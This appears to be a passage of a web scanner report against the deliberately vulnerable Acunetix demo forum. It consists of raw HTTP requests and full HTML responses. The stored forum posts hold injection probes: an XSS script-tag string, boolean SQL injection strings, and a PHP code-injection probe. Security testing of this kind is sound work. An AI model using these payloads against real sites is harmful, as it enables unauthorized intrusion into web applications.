<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'"()&%<acx><ScRiPt >V7NV(9478)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4133 |
Response Body - size: 4,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>5559996333</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4179 |
Response Body - size: 4,179 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum '.print(md5(31337)).' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/'.print(md5(31337)).' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>'.print(md5(31337)).' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4243 |
Response Body - size: 4,243 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+983-983-1=0+0+0+1 or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=41 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4237 |
Response Body - size: 4,237 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+983-983) or '3dwOAUtS'=' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=42 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=42 HTTP/1.1
